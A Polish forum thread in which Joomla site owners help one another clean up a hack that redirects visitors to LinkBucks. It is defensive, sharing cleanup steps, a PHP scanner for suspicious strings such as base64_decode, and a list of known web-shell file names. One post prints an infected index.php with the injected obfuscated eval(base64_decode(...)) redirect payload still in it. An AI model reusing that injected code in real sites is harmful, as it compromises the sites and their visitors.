Witam,
Mam problem z witryną w Joomla 1,5-24PL. Witryna automatycznie przekierowuje się
na stronę LinkBucks(com) Mniej więcej po 30 sekundach braku aktywności na stronie.
Ostatnio dodawałem do strony dodatek - filmy Youtube.
Film był wykonany w darmowym programame VirtualDub.
Bardzo proszę o pomoc jak usunąć przekerowanie. Pozdrawiam

Wg mnie trzeba tutaj postępować zgodnie z procedurą przyjetą dla witryn po włamaniu.
Procedura opisana na wiki.joomla.pl w dziale bezpieczeństwo o ile dobrze pamiętam

Witam!
Mam dokładnie ten sam problem. Prawdopodobnie to przez trojana jedengo z użytkowników, który wrzucał zdjęcia na stronę przez moduł phoca gallery. Męczę się już z tym parę dni. Czy autorowi udało się z nim uporać?

Czytałeś, co jest napisane post wyżej?
wiki - witryna po włamaniu

Nie dalej jak wczoraj usuwałem skutki takiego ataku. Radzę bardzo dobrze sprawdzić wszystkie pliki. Niestety ja znalazłem sporo gif'ów ze złośliwym kodem.
Przede wszystkim zrobić kopię tej zawirusowanej strony (żeby można ewentualnie później diagnozować co się stało).
Koniecznie sprawdzić daty zmian/modyfikacji wszystkich plików (skrypt można znaleźć tutaj --> http://www.trzepizur.pl/blog/item/149-joomla-hacked-by-hmei7.html)
Aktualizacja Joomla! i wszystkich komponentów. Zmiana haseł do bazy, FTP, konta hostingowego, Panelu Administratora Joomla!.

Koniecznie przeskanować sobie komputer jakimś antywirusem. Odciąć od Joomla! wszystkich innych administratorów na czas prac i sprawdzenia przez nich swoich komputerów.

i jak napisali wyżej koledzy, przeczytać "Witryna po włamaniu"

Czytałeś, co jest napisane post wyżej?
wiki - witryna po włamaniu
Tak się składa, że czytałem - poza tym to dwa posty wyżej o tym ktoś podobnie napisał więc nie ma sensu się powtarzać i niepotrzebnie generować posty, chyba że chcesz dać taką radę:


Nie dalej jak wczoraj usuwałem skutki takiego ataku. Radzę bardzo dobrze sprawdzić wszystkie pliki. Niestety ja znalazłem sporo gif'ów ze złośliwym kodem.
Przede wszystkim zrobić kopię tej zawirusowanej strony (żeby można ewentualnie później diagnozować co się stało).
Koniecznie sprawdzić daty zmian/modyfikacji wszystkich plików (skrypt można znaleźć tutaj --> http://www.trzepizur.pl/blog/item/149-joomla-hacked-by-hmei7.html)
Aktualizacja Joomla! i wszystkich komponentów. Zmiana haseł do bazy, FTP, konta hostingowego, Panelu Administratora Joomla!.

Koniecznie przeskanować sobie komputer jakimś antywirusem. Odciąć od Joomla! wszystkich innych administratorów na czas prac i sprawdzenia przez nich swoich komputerów.


, za którą dziękuję użytkownikowi trzepiz, bo skryp "wypier.php" z jego linku to lek na całe zło szczególnie, że na mojej stronie od roku nie było istotnych zmian więc dzięki skryptowi odrazu widzałem, które plki są "nie halo".
Wracając do turtorialu z wiki, to ogólnie konkluzja jest taka, że najbezpieczniej jest usunąć katalog public_html i postawić stronę od nowa, gdzie w przypadku mojej strony nie ma za bardzo sensu. Za to jest sens skorzystać ze skryptu "wypier.php". Ponadto uaktualniłem moduł jceeditor (zachodzi podejrzenie, że to przez niego skrypt dostał się na stronę) oraz samą joomlę.
Jeszcze raz dzięki. Pozdr

Nie wiem czy już sobie poradziłeś z tym problemem ale mnie dzisiaj spotkało to samo. Mi udało się załatwić to dość szybko.
1. usunołem troszke plików z serwera moje zainfekowane pliki zwały się :
w.php
x.php
z.php
pp1.php
i nie były tylko w katalogu głównym ale również w katalogach komponentów.

/images/stories/susu.php
tego pliku nie znalazłem u siebie, za to znalazłem zainfekowanego gifa o nazwie:
000-aaz.gif

Tak wygląda zainfekowany index.php

to co zaznaczone na czerwono trzeba usunąć

<?php
/**
* @version $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
eval(base64_decode('aGVhZGVyKCJSXDE0NVwxNDZcMTYyXH g2NXNceDY4XDA3Mlx4MjAyXHgzNTtcMDQwXDE2NVx4NzJcMTU0 XHgzZFwiXDE1MHR0XHg3MFwwNzIvL1x4NjZceDYzXHg2MmFceD cyXHg2M1wxNDVcMTU0XHg2Zlx4NmVhXHg2NFwxNTdceDY0XDE1 N2NcMTU3bVwwNTZcMTUxXHg2ZVx4NjZceDZmXDA1N1wxNDZceD cyXCIiKTs='));
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');

/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
* RENDER THE APPLICATION
*
* NOTE :

i wszystko wraca do normy

a tutaj skrypcik który wykrywa wszystkie zainfekowane pliki wystarczy wkleić do notatnika i zapisać wrzucić na serwer i odpalić http://nazwastrony.pl/nazwa (http://nazwastrony.pl/nazwa)skrypru.php

<html><head><title>Find Strings</title></head><body>
<?php
// ini_set('max_execution_time', '0');
// ini_set('set_time_limit', '0');
find_files('.');
function find_files($seed) {
if(! is_dir($seed)) return false;
$files = array();
$dirs = array($seed);
while(NULL !== ($dir = array_pop($dirs)))
{
if($dh = opendir($dir))
{
while( false !== ($file = readdir($dh)))
{
if($file == '.' || $file == '..') continue;
$path = $dir . '/' . $file;
if(is_dir($path)) { $dirs[] = $path; }
else { if(preg_match('/^.*\.(php[\d]?|txt|js|htaccess)$/i', $path)) { check_files($path); }}
}
closedir($dh);
}
}
}
function check_files($this_file)
{
$str_to_find[]='base64_decode';
$str_to_find[]='edoced_46esab'; // base64_decode reversed
$str_to_find[]='preg_replace';
$str_to_find[]='HTTP_REFERER';
$str_to_find[]='HTTP_USER_AGENT';

if(!($content = file_get_contents($this_file)))
{ echo("<p>Could not check $this_file You should check the contents manually!</p>\n"); }
else
{
while(list(,$value)=each($str_to_find))
{
if (stripos($content, $value) !== false)
{
echo("<p>$this_file -> zawiera $value</p>\n");
}
}
}
unset($content);
}?>
</body></html>

A i jeszcze jedno na zagranicznych forach wyczytałem jeszcze kilka nazw zainfekowanych plików oto lista :



0day.php
c99.php
config.root
css.php
en-gt.php
index.old.php
lib.php
maroc.php
r57.php
rc.php
story.php
tar.tmp
toy.php
web1.php
wh.php
Wos.php
xxu.php
xxx.php
zzzzx.php

Dodam tylko, że jest jeszcze drugi przypadek i wówczas najlepiej ściągnąć sobie witrynę na kompa i przejrzeć czy w katalogu głównym nie pojawiły się jakieś dziwne jpgi i gify. To samo należy uczynić z folderem images.

Dodatkowo za pomocą np. Notepada ++ wyszukujemy frazę base64 i patrzymy, w których plikach są jakieś podejrzane wartości typu

return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');

Do zdekodowania hasha można posłużyć się tą stroną (http://www.base64decode.org/)

Mnie wykryło obecność plików
p.php
pp.php
mod.php

które oczywiście są do wywalenia

Mnie też to spotkało moja strona www.parafiawysoka.pl, mam pytanie robiłem backup 2 miesiące temu czy mogę usunać cały katalog i przywrócić strone z backupu, czyw ten sposób usune wirusa?

Jeśli backup jest stworzony z "czystej" kopii strony to tak. A jeśli kopia zawiera złośliwe pliki, to jedynym wyjściem jest wyczyszczenie katalogów i plików z nadmiarowego kodu.

Miałem włamanie na strone w kwietniu i informatyk mi wyczyścił ją ze szkodliwego oprogramowania i wtedy zrobiłem backup, wtedy byłoto groźnewłamanie bo strona przypuszczała atak na serwer i administrator ją zablokował aż do usunięcia szkodliwego kodu. Przywrócę ją z backupu bonie znam sie na tyle by znaleść podstawione pliki hakera.

A jeszcze jedno pytanie, może bezpieczniej bedzie jak założe 2 konto użytkownika na komputerze i z niego będe jedynie zaglądał na strone. Bo na tym koncie co teraz w rózne miejsca się wchodzi i mogę coś złapać znowu :/...

Kochany, dokształć się pilnie albo daruj sobie prowadzenie witryny. Administrowanie witryną to odpowiedzialny obowiązek także wobec innych użytkowników serwera i Internetu. Jeśli doprowadzasz przez niewiedzę do zapaskudzenia swojej strony, to rozsiewasz świństwo po Sieci, narażasz innych, a do tego sam nie wiesz, co robisz.

No zgadzam się z przedmówcą. Jeśli już zdecydowałeś się na prowadzenie strony, to albo podszkol się z jej funkcjonalności, albo powierz prowadzenie pracy komuś, kto się na sprawie zna.

Co do zakładania drugiego konta, to nie widzę w tym większego sensu. Przede wszystkim pozmieniaj hasła do FTP, konta admina i ewentualnie bazy danych. Wówczas w Joomli też musisz pozmieniać hasło do bazy i FTP(jeśli masz obsługę FTP ustawioną od zaplecza). A samo świństwo z tego co pamiętam łapało się przez dziurę w edytorze JCE, chociaż ostatnimi czasy zauważyłem dziwne działanie komponentu Akeeba - najpierw się wywalił komponent do tworzenia kopii zapasowych, a potem pojawiły się w tajemniczy sposób pliki index_backup.php, dziwne wpisy w .htaccess i mnóstwo plików w(8cyfr)n.php zawierających złośliwy kod. Tradycyjnie kod był ukryty poprzez base64, a sam skrypt tym razem nigdzie nie przekierowywał, a rozsyłał spam.